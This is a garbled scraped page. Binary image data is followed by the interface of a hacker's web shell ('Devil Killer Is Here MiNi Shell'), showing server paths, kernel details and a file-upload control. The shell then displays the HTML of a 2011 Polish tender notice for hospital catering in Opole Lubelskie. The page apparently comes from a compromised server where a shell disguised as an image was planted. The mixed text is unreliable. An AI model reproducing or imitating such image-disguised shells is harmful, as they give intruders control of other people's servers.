JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111114/295681-N-2011.html

<p class="kh_header"><b>Opole Lubelskie: usługi przygotowywania posiłków</b><br>
<b>Numer ogłoszenia: 295681 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Przemysłowa 4a, 24-300 Opole Lubelskie, woj. lubelskie, tel. 81 8272278, faks 81 8272278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozopolelubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi przygotowywania posiłków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: Usługi przygotowywania posiłków -przygotowywanie i dostawę posiłków na rzecz  Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Opolu Lubelskim dla potrzeb hospitalizowanych w Szpitalu Powiatowym w Opolu Lubelskim

1.     Przygotowywanie posiłków w dotychczas eksploatowanych pomieszczeniach kuchni o pow. 318,79m2  w budynku głównym Szpitala w Poniatowej ul. Fabryczna 18, które Wykonawca obejmie do używania na podstawie umowy dzierżawy, której wzór stanowi załącznik nr 8.

2.Stawka za 1m2 powierzchni dzierżawionej kuchni wynosi 13,00 zł netto

3. Koszt dzierżawy urządzeń stanowiących wyposażenie kuchni - 125,00 zł.netto
miesięcznie.

4. Przejęcie pracowników zatrudnionych w kuchni Szpitala Powiatowego w Opolu Lub. 
    baza w Poniatowej ul. Fabryczna 18, na zasadzie art. 231 Kodeksu Pracy - w ilości 1 osoba.

5.Wykonawca zobowiązuje się do wykonania powierzonej usługi z zachowaniem najwyższej staranności zawodowej  przestrzegając obowiązujących przepisów prawa w zakresie higieny żywienia -HACCP (kserokopię  Certyfikatu HACCP ).
	
6.Wyżywienie musi odpowiadać normom żywieniowym zgodnie z przepisami ustalonymi przez Instytut Żywności i Żywienia, , dla zamkniętych zakładów służby zdrowia pod względem ilościowym i jakościowym, a w szczególności ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (tekst jednolity  DZ. U. z 2010r. Nr 136 poz. 914).

7.Wykonawca zobowiązuje się dostarczać posiłki na poszczególne oddziały szpitalne mieszczące się w  szpitalu w Poniatowej ul. Fabryczna 18 oraz szpitalu w Opolu Lubelskim ul. Szpitalna 9, zgodnie z obowiązującymi w tym zakresie przepisów prawa, w szczególności sanitarno epidemiologicznych.

8.Zamówienie dotyczy następujących oddziałów:
szpital w Poniatowej:
- oddział dziecięcy łóżek 20
- oddział chorób wewnętrznych łóżek 30
- oddział laryngologiczny łóżek 18
- oddział rehabilitacyjny   łóżek 18
- oddział ortopedii i traumatologii narządu ruchu  łóżek 18
- położnictwo, ginekologia 20

szpital w Opolu Lubelskim:
- oddział chirurgiczny łóżek 24
- oddział chorób internistyczno kardiologiczny łóżek 34
- oddział medycyny paliatywnej  łóżek 20
- oddział zakład opiekuńczo leczniczy   łóżek 25

9. Ilość łóżek wynosi ok. 227 dla obu szpitali - obłożenia ok 65%

10.Dzienne zapotrzebowanie na posiłki dla hospitalizowanych wynosi średnio : 
           szpital w Poniatowej ok. 124 (łóżek) posiłków,
           szpital w Opolu  Lubelskim ok. 103 (łóżek) posiłków.

11.Zamawiający zastrzega sobie  możliwość zakupu innej ilości posiłków niż podana powyżej,  w zależności od ilości hospitalizowanych pacjentów. 

12.Całodzienne wyżywienie składa się z:
 śniadanie stanowiące 25% kosztu całodobowego;
 obiadu stanowiącego 50% kosztu całodobowego;
 kolacji stanowiącej 25% kosztu całodobowego;
w przypadku pacjentów przygotowywanych do zabiegu operacyjnego (w przed dzień zabiegu) przysługuje obiad (zupa + kompot) stanowiący 15% kosztu całodobowego
          Dodatkowo w stawce żywieniowej mieszczą się  : 
 II śniadanie (dla diety cukrzycowej i dzieci) 
podwieczorek (dla diety cukrzycowej,  dzieci oraz pacjentów oddziału Medycyny Paliatywnej i  ZOL ) - na zlecenie lekarza oddziału kolacja nocna ( dla diety cukrzycowej).
13.  Pacjenci oddziału Medycyny Paliatywnej i Zakładu Opiekuńczo Leczniczego
powinni otrzymywać posiłki rozdrobnione, mielone, zmiksowane o
odpowiedniej   kaloryczności.

14. Procent dziennego zapotrzebowania na energię musi przypadać na:
    - I śniadanie	- 25-30%
    - II śniadanie	-   5-10%
    - obiad		- 30-35%
    - podwieczorek	-   5-10%
    - kolacja		- 20-30%

15.Kaloryczność posiłków - nie niższa od 2500 kalorii dziennie (w zależności od 
     rodzaju diety).
     Energia pochodząca z białka 12,38%, energia pochodząca z tłuszczu - 26,23%, 
     energia pochodząca z węglowodanów - 61,39%.

16. Wyżywienie musi odpowiadać normom żywieniowym zgodnie z 
    obowiązującymi przepisami prawa dla Zamkniętych Zakładów Służby Zdrowia pod 
    względem ilościowym i jakościowym, które dla poszczególnych diet wynoszą:
   - ilość białka - dla diety lekko strawnej 70g/dobę
                       - dla diety wysokobiałkowej ponad 100g/dobę (1,5-2g białka/kg wagi
                          ciała na dobę)
                       -  dla diety niskobiałkowej 40-50g/dobę
                       -  dla diety niskokalorycznej 80-120g/dobę
                       - dla diety niskotłuszczowej 70g/dobę
- ilość tłuszczów	- dla diety niskotłuszczowej 50-60g/dobę
                       	- dla diety niskokalorycznej 25-35g/dobę, 800-1500kal
- węglowodanów	- dla diety wysokowęglowodanowej ponad 350g/dobę
                             	- dla diety niskowęglowodanowej poniżej 100g/dobę
                             	- dla diety niskokalorycznej 50-150g/dobę
- NaCL - dla diety niskosolnej poniżej 4g/dobę
                	- dla diety małosolnej poniżej 1g/dobę
- błonnik	- dla diety wysokobłonnikowej 13g/dobę
                	- dla diety niskobłonnikowej 3,5g/dobę
- witaminy - A	- 1948,70 ug dziennie/osobę
                  - E       -     13,04 mg dziennie/osobę 
                  - C	-    55,75 mg dziennie/osobę
                  - B1	-      1,18 mg dziennie/osobę
                  - B2	-      1,45 mg dziennie/osobę
                  - Wapń - 572,93 mg dziennie/osobę
                  - Żelazo - 11,13 mg dziennie/osobę
                  - Fosfor - 1150,13 mg dziennie/osobę
                  - Magnez - 255,99 mg dziennie/osobę
                  - Sód - 178,93 mg dziennie/osobę
                  - Potas - 3098,71 mg dziennie/osobę

 17. Dostawa posiłków będzie następowała każdego dnia w godzinach:
                   - śniadanie i II śniadanie o godz.  7:30- 8:00
                   - obiad 12:30- 13:00
                   -  podwieczorek o godz. 15:00
                   - kolacja i kolacja nocna  o godz. 17:30- 17: 45
do kuchenek oddziałowych.

18. Dystrybucję posiłków do łóżek pacjentów zapewnia personel Zamawiającego
19. Posiłki tj. śniadanie, II śniadanie, II danie obiadowe, podwieczorek kolacja i
kolacja nocna dostarczane będą w pojemnikach trójdzielnych wielokrotnego użytku,
wyporcjowane bezpośrednio w kuchni Wykonawcy, szczelnie przykryte  pozwalające
na utrzymanie temperatury potraw( II dania 60-65 oC)
20. Potrawy płynne tj. zupy, napoje dostarczane będą w naczyniach zbiorczych -
termosach pozwalających na utrzymanie odpowiedniej temperatury potraw.
( zupy 70- 75oC, napoje gorące 80 oC )
21. Napoje, zupy mleczne,  zupy obiadowe będą porcjowane i wydawane przez personel Zamawiającego do pacjentów w naczyniach wielokrotnego użytku( talerze, kubki),
których to  odpowiednią ilość zapewni Wykonawca w stosunku do potrzeb.
22. Wykonawca zapewni również odpowiednią o potrzeb ilość sztućców( łyżki, widelce,
noże).
23. Wykonawca zobowiązany jest dostarczyć tzw. łyżki porcjowe niezbędne do
prawidłowego wydawania posiłków( do napojów i  zup).
24. Wykonawca zobowiązuje się na bieżąco wymieniać uszkodzone naczynia i sztućce
25. Mycie  naczyń leży po stronie Wykonawcy, nie dopuszcza się możliwości
korzystania w tym celu z kuchenek zlokalizowanych w oddziałach.
26. Wszystkie naczynia wielokrotnego użytku Wykonawca zobowiązuje się zgodnie z
wymogami sanitarno-epidemiologicznymi dezynfekować przed każdorazowym
użyciem
27. Po spożyciu posiłków brudne naczynia, sztućce, naczynia zbiorcze po zupie i
napojach, będą pakowane przez personel Zamawiającego do specjalnych pojemników
które to udostępni Wykonawca, a następnie zabierane przez personel Wykonawcy do
jego kuchni w ciągu ok. 1 godziny od dostarczenia posiłków.
28. Wykonawca zobowiązuje się do  odbioru odpadów pokonsumpcyjnych
niezwłocznie każdorazowo po posiłkach.
29. Po stronie Wykonawcy leży udostępnienie na wszystkie oddziały specjalnych
pojemników z pokrywami służących do zbiórki odpadów pokonsumpcyjnych, a także
ich mycie i dezynfekcją.
30. Z naczyniami i odpadami pokonsumpcyjnymi pochodzącymi od chorych    zakaźnie
Wykonawca postępuje zgodnie z obowiązującymi procedurami i przekazuje je do
utylizacji.
31. Wykonawca winien posiadać  umowę na utylizację odpadów pokonsumpcyjnych.

32. Sposób zamawiania posiłków: na zamówieniu wykazane zostaną ilości posiłków z   
      podziałem  na rodzaj diet.

33. Zapotrzebowanie na posiłki sporządzają i podpisują osoby upoważnione przez 
  Zamawiającego  w oddziałach( w przypadku uruchomienia systemu informatycznego  Zamawiający zastrzega sobie prawo zgłoszeń zamówień w formie elektronicznej).

34. Zapotrzebowanie żywnościowe na dzień bieżący( śniadanie, II śniadanie) odbierał będzie  przedstawiciel Wykonawcy do godz 7:15, a następne zapotrzebowania ( obiad,  podwieczorek, kolacja, kolacja nocna) w trakcie przywozu kolejnego posiłku od 
     dietetyka szpitala. 
 
35. Zleceniodawca zastrzega sobie prawo do telefonicznej korekty zapotrzebowania 
    żywnościowego co do ilości posiłków i rodzaju diet, na dwie godziny przed godziną ich przywozu. 

36. Pisemne potwierdzenie korekty przedstawiciel Wykonawcy odbiera w trakcie przywozu  kolejnego posiłku. 

37. Pacjentowi przysługuje wyżywienie w zależności od godziny przyjęcia do szpitala:
                - pacjent przyjęty do szpitala do godz 6:45 ma prawo do całodziennego
    wyżywienia: śniadanie, obiad, kolacja  oraz II śniadanie, podwieczorek, kolacja
                  nocna  jeżeli jego dieta tego wymaga.
                - pacjent przyjęty do szpitala do godz. 10:30 ma prawo do obiadu, kolacji oraz   podwieczorku , kolacji nocnej jeżeli jego dieta tego wymaga; 
                - pacjent przyjęty do szpitala do godz 13:00 ma prawo do  podwieczorku jeżeli jego  dieta tego wymaga, kolacji i kolacji nocnej również jeżeli jego dieta tego wymaga; 
               - pacjent przyjęty do szpitala do godz. 16:00  ma prawo do kolacji oraz kolacji   nocnej jeżeli jego dieta tego wymaga.
  - pacjent przyjęty do szpitala do godz. 18:00 ma prawo do kolacji nocnej jeżeli jego 
    dieta tego wymaga.
  - w dniu wypisu pacjentowi przysługuje śniadanie, obiad (zupa)
  - w przypadku pacjentów przygotowywanych do zabiegu operacyjnego
                  (w przed dzień zabiegu) przysługuje obiad (zupa + kompot)

38. Wykonawca jest zobowiązany zatrudnić dietetyka  zgodnie z obowiązującymi    
             przepisami.

39. Wykonawca jest zobowiązany do dostarczania jadłospisów dekadowych z
               uwzględnieniem sezonowości, tradycji świąt dla wszystkich oddziałów szpitalnych i  dietetyka szpitalnego.

40. Jadłospis powinien zawierać :
             -   dzienne zestawienie posiłków w rozbiciu na diety:
             dieta ogólna,
             dieta  lekkostrawna,
             dieta  cukrzycowa, 
             dieta wątrobowa,
             dieta  trzustkowa,
             dieta wrzodowa, 
             dieta bezmleczna, 
             dieta płynna 
             dieta kleikowa ( kleik + suchary)
           -  ilość wagową potraw,
41. Wykonawca zobowiązuje się do przygotowania posiłków na diety realizowane na   indywidualne zlecenie lekarza:
             dieta  biegunkowa
             dieta  bezglutenowa
             dieta hipoalergiczna
             dieta papkowata ubogoenergetyczna
             dieta niskocholesterolowa
             dieta bogatobiałkowa
             dieta niskobiałkowa   
 
42. Zawartość innych diet należy dostarczyć na bieżąco w zależności od zamówienia z poszczególnych oddziałów.

43. Wykonawca zobowiązany jest dostarczać wraz z dostawą śniadania 
      Zamawiającemu na każdy dzień wyliczenia wartości odżywczych pod względem   
      ilościowym i jakościowym na 1 osobę realizowanych zgodnie z jadłospisem. 

 44. Jadłospis powinien być przygotowany przez dietetyka Wykonawcy i 
      przedstawiony do akceptacji dietetykowi Zamawiającego na około 3 dni przed 
       wprowadzeniem do realizacji.

45. Wykonawca zobowiązuje się do pobierania i pozostawiania próbek  żywieniowych 
      w swojej siedzibie, zgodnie z obowiązującymi przepisami.

46.  Wykonawca zobowiązuje się na własny koszt raz na pół roku dokonywać 
       weryfikacji prawidłowości sporządzanych posiłków przez Stację Sanitarno- 
       Epidemiologiczną.

47. Wykonawca zobowiązuje się do przeprowadzania na własny koszt badań okresowych  na czystość mikrobiologiczną z urządzeń, sprzętu, powierzchni mających kontakt z  żywnością  oraz rąk personelu biorącego udział w przygotowywaniu posiłków.

48. Zamawiający zastrzega sobie prawo do wglądu do wyników po przeprowadzonych 
      kontrolach.

49. Zamawiający zastrzega sobie prawo do wglądu do dokumentacji dotyczącej        
      monitorowania Krytycznych Punktów Kontroli przy produkcji posiłków.

50. Zamawiający zastrzega sobie prawo do  przeprowadzania w miejscu 
       przygotowania posiłków, kontroli sprawdzających jakość, i gramaturę artykułów 
       żywnościowych służących do przygotowywania posiłków.

51. Do kontroli zakresu świadczonych usług ze strony Zamawiającego uprawnieni    
      są: Dyrektor szpitala, Pielęgniarka Naczelna, Pielęgniarka Epidemiologiczna, Dietetyczka, Pielęgniarki Oddziałowe wszystkich oddziałów, Pielęgniarki dyżurne.

52. Wykonawca gwarantuje przygotowywanie posiłków z zachowaniem wymogów 
       sanitarnohigienicznych oraz innych obowiązujących w tym zakresie przepisów prawa.

53. Wykonawca ponosi prawną i materialną odpowiedzialność za wykonane usługi przed
         uprawnionymi organami kontroli zewnętrznej oraz przed Zamawiającym.

54. Wykonawca ponosić będzie odpowiedzialność odszkodowawczą za szkody powstałe w wyniku prowadzonej działalności ( np. zatrucia pokarmowe).

55. W sytuacjach nagłych  niemożliwych  do przewidzenia  wcześniej odpowiedzialność za ciągłość żywienia pacjenta w SP ZOZ w Opolu Lub. ponosi Wykonawca.

56. Cena podana przez Wykonawcę w ofercie będzie ceną stałą przez okres dwunastu 
     miesięcy od  daty zawarcia umowy. Po upływie okresu stałości ceny mogą  ulec zmianie na + i na - tylko z przyczyn niezależnych od Wykonawcy  -  ciężar dowodu z dokumentów przy wzroście ceny  obciąża Wykonawcę - nie więcej  jednak  niż o 5% w każdym roku, w okresie obowiązywania  umowy oraz z powodu  zmiany podatków.

57. Każda zmiana ceny przedmiotu umowy wymaga formy aneksu do umowy.

58. Forma i termin płatności - okresy miesięczne, przelew 30 dni od daty      
     doręczenia faktury VAT.

59. Opomiarowanie (gaz, energia elektryczna, woda, centralne ogrzewanie),  wykonawca ponosi  koszty mediów -  wykonawca ponosi wszystkie koszty związane z dzierżawieniem kuchni.

60. W czasie trwania dzierżawy, Wykonawcę obciążają drobne nakłady związane 
     z przedmiotem dzierżawy. Do drobnych nakładów strony zaliczają: drobne naprawy  podłogi,  drzwi, okien, malowanie ścian i okien oraz drobne naprawy instalacji i urządzeń technicznych  zapewniających korzystanie ze światła, ogrzewanie   przedmiotu dzierżawy, dopływu i odpływu wody.

61. Zamawiający zastrzega sobie prawo zmiany miejsca dostarczania posiłków, zgodnie z planem dostosowawczym Zakładu.

62. Zestawienie rodzajów i ilości wydanych posiłków z danego dnia Wykonawca będzie zobowiązany przedkładać dietetykowi SP ZOZ w dniu następnym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub  
 czynności,  jeżeli ustawy nakładają obowiązek posiadania takich         
 uprawnień,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują  potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami zdolnymi do wykonania zamówienia,
          - warunek ten zostanie spełniony , jeżeli:
  a)  wykonawca zatrudnia przeciętnie  co  najmniej 5 pracowników , w 
      tym 3  kucharzy i 1 dietetyka , z doświadczeniem zawodowym na 
      zajmowanym  stanowisku - staż pracy- , w tym co najmniej 2  
     kucharzy  ze  stażem w  zawodzie kucharza  wynoszącym 5 lat.,
 b) wykonawca wykonał co najmniej dwa zamówienia odpowiadające 
     swoim  rodzajem i wartością  usłudze stanowiącej przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
        -  warunek ten zostanie spełniony, jeżeli wykonawca:
     jest ubezpieczony od odpowiedzialności cywilnej w zakresie  
     prowadzonej działalności i suma gwarancyjna wynosi co najmniej                   
     500 000zł.
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozopolelubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2011 godzina 13:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej 
24-300 Opole Lubelskie, ul. Przemysłowa 4a, pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





